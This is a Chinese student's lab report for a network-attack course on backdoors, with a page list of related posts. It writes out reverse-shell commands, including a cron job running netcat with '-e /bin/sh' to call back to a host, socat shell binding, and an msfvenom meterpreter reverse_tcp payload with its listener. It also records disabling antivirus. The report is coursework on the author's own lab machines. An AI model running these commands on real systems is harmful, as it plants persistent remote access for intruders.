20145214《网络对抗》MAL_后门原理与实践
20145214《网络对抗》MAL_后门原理与实践
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
- 网页上查找资料时有时会不小心点到弹出来的广告,如果这个广告是个钓鱼链接,它可能就在我的系统中留下了后门
(2)例举你知道的后门如何启动起来(win及linux)的方式?
- 有可能是自启动的后门,也有可能像这次实验中做的,是个定时启动的后门
(3)Meterpreter有哪些给你映像深刻的功能?
- 这是一个强大的后门平台!印象深刻的是它居然可以拍照!!但是因为摄像头有权限设置,我没有完成捕捉照片的功能..不过其他的截屏、获取权限等功能依旧让人觉得自己身边危机重重
(4)如何发现自己有系统有没有被安装后门?
- 做了这个实验发现360安全卫士和windows defender真的还是有点用的,做的过程中一直弹出来阻碍实验,最后不得不卸载了安全卫士关掉了defender
- 其他的方法,上学期好像还学过查看注册表,查看开放的端口等等
实践过程记录
1、Windows获得Linux Shell
首先下载解压ncat和socat,查看windows下的IP地址,用'ipconfig'指令
- 进入ncat程序,监听本机的'5214'端口
- 在kali下,用'nc'指令连接主机的'5214'端口,使用'-e'选项
此时windows就可以获取到kali的shell,尝试运行'ls'指令如下图
2、Linux获得Windows Shell
查看kali的IP地址,并且用'nc'指令监听'5214'端口
在windows下使用ncat程序反向连接该端口,kali就能得到windows的shell,可以得到windows的提示符,执行'dir'指令如下图
3、使用nc传输数据
- windows再次用ncat程序开放端口,kali进行连接,建立连接后,双方可以“在线聊天”,也可以用重定向操作符来传输文件
4、用ncat获取shell,crontab启动
- 在windows下监听'5214'端口
- 用'crontab -e'指令编辑一条定时任务,选择vim编辑器,在最后一行添加'时间 * * * * /bin/netcat 本机的IP地址 端口号 -e /bin/sh',可以在每个小时的固定分钟到来时反向连接Windows主机的开放端口
- 在这个时间到来之前,在ncat程序下输入命令是无法显示的,只有时间到的时候才会执行命令
5、socat获取shell
- 需要在windows下新建触发器和操作,把'cmd.exe'绑定到端口'5214',同时把'cmd.exe'的'stderr'重定向到'stdout'上
- 在kali下输入'socat - tcp:主机的IP地址:端口号',可以获得windows的cmd shell
6、meterpreter获取shell
输入'msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的IP地址 LPORT=端口号 -f exe > 20145214_backdoor.exe'生成后门程序20145214_backdoor.exe
windows下开放该端口,kali通过'nc'指令将生成的后门程序传送到Windows主机上,在Kali上使用'msfconsole'指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口
用'exploit'指令进行监听,同时开启windows上的后门程序,Kali可以获得Windows主机的连接,远程控制shell
远程控制截屏如下
实验总结与体会
- 实验之前听说win8比win7更难攻击一点,事实确实如此,为了顺利完成实验,卸载了安全卫士关掉了windows defender,终于成功被攻击了。但是在使用meterpreter时还是被强大的功能震撼了,原来身边潜伏的危险很多很多,做完实验赶紧重新打开defender下载安全卫士,看到实验指导中说免杀完的后门杀毒软件就不会被发现了,有些期待做免杀实验了
- 另外实验中有很多指令自己还不是很熟悉,看着组长和课题负责人的博客一步一步做下来,其实对指令中一些选项的含义还是一知半解,希望自己以后能做到熟能生巧吧
20145214《网络对抗》MAL_后门原理与实践的更多相关文章
- 20155323刘威良 网络对抗 Exp2 后门原理与实践
20155323 刘威良<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主机操作Shell, ...
- Exp2 MAL_后门原理与实践 20155214
目录 Exp2 MAL_后门原理与实践 实验内容 通过nc反向连接创建后门 meterpreter应用 主要思路 知识点 启发 Exp2 MAL_后门原理与实践 本次实验操使用nc实现win,mac, ...
- 20155331 丹增旦达 网络攻防 Exp2后门原理与实践
20155331 丹增旦达<网络攻防>Exp2后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启 ...
- 20144306《网络对抗》MAL_后门原理与实践
本期收获 1.了解后门的基本概念. 2.Netcat.socat.MSF meterpreter的使用(MSF meterpreter实在太好玩了) 3.后门软件的启动方式: Windows任务计划程 ...
- 20155302 Exp2 后门原理与实践
20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0 ...
- 20145204《网络对抗》MAL后门原理与实践
20145204<网络对抗>MAL后门原理与实践 实践内容说明 (1)使用netcat获取主机操作Shell,cron启动 (1分) (2)使用socat获取主机操作Shell, 任务计划 ...
- 2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理与实践
#2017-2018-2 <网络对抗技术> 20155322 第五周 Exp2 后门原理与实践 [博客目录] 1-实践目标 1.1-实践介绍 1.2-实践内容 1.3-实践要求 2-实践过 ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
随机推荐
- bat设置windows计划任务
设置定时任务 @echo off set NAME=dailybackup :: set DAY=MON,TUE,WED,THU,FRI,SAT,SUN set COMMAND=cscript.exe ...
- 【VSC】.txt文件打开乱码
我在拉取项目之后打开其备注文件查看,发现里面的中文乱码,在网上寻找解决方案自定义设置并没有什么作用. 回到文件目录用记事本打开,在里面随意输入中文,保存. 之后———— 恩,vscode中的该文本同步 ...
- 3DES加解密 C语言
3DES(或称为Triple DES),它相当于是对每个数据块应用三次DES加密算法.3*8字节密钥. 设Ek()和Dk()代表DES算法的加密和解密过程,K代表DES算法使用的密钥,P代表明文,C代 ...
- Java类是如何默认继承Object的?
原:https://juejin.im/post/5ca1e8ade51d454e6a300048 前言 学过Java的人都知道,Object是所有类的父类.但是你有没有这样的疑问,我并没有写exte ...
- 转:超级好用的流程图js框架
支叫图论(Graph Theroy).利用图我们可以做很多工具,比如思维导图,流程图,状态机,组织架构图,等等.今天我要做的是用开源的HTML5工具来快速构造一个做图的工具. 工具选择 预先善其事,必 ...
- C++学习第一天(helloword)
C++编译过程 #include <iostream> //iostream 提供了一个叫命名空间的东西,标准的命名空间是std 包含了有关输入输出语句的函数 // input&^ ...
- VIM - tab 相关的简单配置
1. 概述 vim 是强大的文本编辑器 使用 vim 前, 需要做些简单配置, 来让 vim 更符合自己的操作习惯 想看配置项的, 直接到最后 2. 准备 安装 vim 略 配置文件 位置 /etc/ ...
- Java——String类总结---18.09.27
1.String类 String类在java.lang包中,java使用String类创建一个字符串变量,字符串变量属于对象.java把String类声明的final类,不能有类.String类对象创 ...
- mssqlserver的md5函数
参考:https://www.cnblogs.com/JuneZhang/p/6396896.html?utm_source=itdadao&utm_medium=referral 简单说明: ...
- 20155227《网络对抗》Exp1 PC平台逆向破解(5)M
20155227<网络对抗>Exp1 PC平台逆向破解(5)M 实验目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数 ...